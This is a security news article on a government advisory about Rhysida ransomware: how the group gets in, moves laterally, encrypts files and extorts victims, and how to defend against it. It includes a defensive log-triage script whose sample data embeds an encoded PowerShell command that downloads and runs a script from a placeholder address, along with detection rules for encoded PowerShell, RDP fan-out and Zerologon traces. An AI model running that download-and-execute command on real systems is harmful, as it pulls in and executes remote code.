FBI, CISA and MS-ISAC warn about Rhysida ransomware operations

New but significant threat of Rhysida ransomware

Since it was first observed in May 2023, Rhysida ransomware has targeted organizations across multiple industry sectors. The Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) have jointly issued a detailed advisory,[1] alerting organizations to the growing threat posed by this ransomware variant.

Rhysida first gained public attention following its breach of the Chilean Army,[2] where the group not only encrypted data but also leaked it online, an early demonstration of its double-extortion approach. The group has been particularly active against critical sectors such as education and government, and the U.S. Department of Health and Human Services (HHS) has also noted Rhysida's significant impact on healthcare organizations.

CISA's advisory notes:[3]

Observed as a ransomware-as-a-service (RaaS) model, Rhysida actors have compromised organizations in education, manufacturing, information technology, and government sectors and any ransom paid is split between the group and affiliates.

Operational tactics of Rhysida

Operating under a ransomware-as-a-service (RaaS) model, Rhysida lets affiliates use its ransomware and infrastructure in exchange for a share of the ransom. For initial access, Rhysida actors typically authenticate to external-facing remote services such as VPNs with compromised valid credentials, and they succeed most often against organizations that have not enabled multi-factor authentication (MFA). Phishing and exploitation of the Zerologon vulnerability (CVE-2020-1472), a privilege-escalation flaw in Microsoft's Netlogon Remote Protocol, are also among the methods they use to gain and maintain access within networks.

Additionally, Rhysida relies on living-off-the-land techniques, such as establishing Remote Desktop Protocol (RDP) connections and using PowerShell for lateral movement. Because these are native Windows tools, the activity blends in with legitimate system and network administration, which makes detection harder.
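To make the living-off-the-land signals above concrete, here is a small triage script, added to this article as an illustration and not taken from the advisory or from any Rhysida sample, that scans a constructed set of Windows Security events for three patterns described in this section: one account logging on over RDP (event 4624, logon type 10) to several hosts from a single source address, PowerShell launched with an encoded command (event 4688, which requires command-line auditing to be enabled), and a domain controller's own computer account changed by ANONYMOUS LOGON (event 4742), a commonly used heuristic for Zerologon (CVE-2020-1472) exploitation. The event records, hostnames, user names, addresses, timestamps and the DOMAIN_CONTROLLERS set are all constructed assumptions; the event IDs and the logon type are real Windows values.

```python
import base64
import json
import re
from collections import defaultdict

# Windows Security log identifiers (real values).
EVENT_LOGON = 4624             # An account was successfully logged on
EVENT_PROCESS_CREATE = 4688    # A new process has been created
EVENT_COMPUTER_CHANGED = 4742  # A computer account was changed
LOGON_TYPE_RDP = 10            # RemoteInteractive: RDP / Terminal Services

# Assumption for this example: the domain controllers in the environment.
DOMAIN_CONTROLLERS = {"DC01"}

# PowerShell takes -EncodedCommand as Base64 of UTF-16LE text; build a
# realistic blob so the constructed sample below decodes correctly.
_ENC_BLOB = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.7/a.ps1')"
    .encode("utf-16-le")).decode("ascii")

# Constructed sample events in the one-JSON-object-per-line shape a SIEM might
# export. Hosts, users, addresses and timestamps are fictitious.
SAMPLE_EVENTS = "\n".join(json.dumps(e) for e in [
    {"EventID": 4742, "Computer": "DC01", "SubjectUserName": "ANONYMOUS LOGON",
     "TargetUserName": "DC01$", "TimeCreated": "2023-11-02T01:10:30Z"},
    {"EventID": 4624, "Computer": "FS01", "LogonType": 10, "TargetUserName": "svc_backup",
     "IpAddress": "10.0.5.23", "TimeCreated": "2023-11-02T01:12:04Z"},
    {"EventID": 4624, "Computer": "DC01", "LogonType": 10, "TargetUserName": "svc_backup",
     "IpAddress": "10.0.5.23", "TimeCreated": "2023-11-02T01:15:40Z"},
    {"EventID": 4688, "Computer": "DC01", "SubjectUserName": "svc_backup",
     "NewProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc " + _ENC_BLOB,
     "TimeCreated": "2023-11-02T01:16:05Z"},
    {"EventID": 4624, "Computer": "APP02", "LogonType": 10, "TargetUserName": "svc_backup",
     "IpAddress": "10.0.5.23", "TimeCreated": "2023-11-02T01:19:12Z"},
    {"EventID": 4624, "Computer": "FS01", "LogonType": 2, "TargetUserName": "jsmith",
     "IpAddress": "-", "TimeCreated": "2023-11-02T09:00:01Z"},
    {"EventID": 4688, "Computer": "APP02", "SubjectUserName": "jsmith",
     "NewProcessName": r"C:\Windows\System32\notepad.exe", "CommandLine": "notepad.exe",
     "TimeCreated": "2023-11-02T10:30:00Z"},
])


def parse_events(text):
    """Parse newline-delimited JSON events, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if there is none.

    PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -en,
    -enc, ...) plus the alias -ec, so the flag is matched loosely.
    """
    for flag, blob in re.findall(r"(?i)(?:^|\s)-(e\w*)\s+(\S+)", cmdline):
        f = flag.lower()
        if not ("encodedcommand".startswith(f) or f == "ec"):
            continue  # e.g. -ExecutionPolicy, -exec
        try:
            return base64.b64decode(blob, validate=True).decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):
            return None  # flag present but payload is not valid Base64/UTF-16LE
    return None


def triage(events, rdp_fanout_threshold=2, domain_controllers=DOMAIN_CONTROLLERS):
    """Apply three living-off-the-land heuristics and return a list of findings."""
    findings = []
    rdp_hosts = defaultdict(set)  # (account, source address) -> hosts reached over RDP
    for ev in events:
        eid = ev.get("EventID")
        if eid == EVENT_LOGON and ev.get("LogonType") == LOGON_TYPE_RDP:
            rdp_hosts[(ev["TargetUserName"], ev.get("IpAddress", "-"))].add(ev["Computer"])
        elif eid == EVENT_PROCESS_CREATE and ev.get("NewProcessName", "").lower().endswith(
                ("powershell.exe", "pwsh.exe")):
            decoded = decode_encoded_command(ev.get("CommandLine", ""))
            if decoded is not None:
                findings.append({"rule": "encoded_powershell", "host": ev["Computer"],
                                 "user": ev.get("SubjectUserName"), "decoded": decoded})
        elif (eid == EVENT_COMPUTER_CHANGED
              and ev.get("SubjectUserName", "").upper() == "ANONYMOUS LOGON"
              and ev.get("TargetUserName", "").rstrip("$") in domain_controllers):
            # A DC's own machine account changed by an anonymous caller is the
            # trace left by a Zerologon-style machine-password reset.
            findings.append({"rule": "zerologon_like_account_change", "host": ev["Computer"],
                             "target": ev["TargetUserName"], "time": ev.get("TimeCreated")})
    # One account reaching several hosts over RDP from one source looks like lateral movement.
    for (account, source), hosts in rdp_hosts.items():
        if len(hosts) >= rdp_fanout_threshold:
            findings.append({"rule": "rdp_fanout", "user": account, "source": source,
                             "hosts": sorted(hosts)})
    return findings


if __name__ == "__main__":
    print(json.dumps(triage(parse_events(SAMPLE_EVENTS)), indent=2))
```

Run as a script it prints the findings for the constructed sample as JSON; in practice you would feed it events exported from your SIEM and tune the RDP fan-out threshold to the environment. Two caveats: event 4688 only carries a command line when the "Include command line in process creation events" policy is enabled alongside process-creation auditing, and all three rules are heuristics that need the usual allow-listing for jump hosts, administrators and management tooling.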

Rhysida's encryption is a hybrid scheme: file contents are encrypted with the ChaCha20 stream cipher, and, as in the usual hybrid construction, the ChaCha20 key material is protected with a 4096-bit RSA key, so encrypted files cannot be recovered without the attackers' RSA private key. Once the data is encrypted, the ransomware appends the .rhysida extension to file names and drops a ransom note, named ‘CriticalBreachDetected’, that urges victims to pay in Bitcoin and directs them to a Tor-based portal for payment instructions. The note is part of Rhysida's double-extortion tactic: the group demands ransom for decryption and threatens to publish stolen data if the demand is not met.

Rhysida overlaps with the Vice Society ransomware group, which Microsoft tracks as Storm-0832 (Vanilla Tempest); the two share targeting patterns and tooling. The shift from Vice Society to Rhysida was noted around July 2023, when Rhysida began listing victims on its data leak site.

Mitigation and defense strategies

Defending against Rhysida starts with the basics. Organizations should prioritize remediating vulnerabilities that are already known to be exploited, Zerologon (CVE-2020-1472) among them, since patching those removes the openings the group is actually using.

A key measure is multifactor authentication (MFA) across all organizational services, with particular emphasis on webmail, VPNs, and accounts that have access to critical systems. MFA requires a second factor that a compromised password alone cannot satisfy, which directly counters Rhysida's credential-based VPN access.

Network segmentation is the third pillar. Dividing the network into separately secured zones limits how far ransomware can spread: with segmentation in place it is harder for Rhysida to move laterally over RDP and infect multiple systems, which contains the damage from a single compromised host.

About the author
Gabriel E. Hall

Gabriel E. Hall is a passionate malware researcher who has been working for 2-spyware for almost a decade.
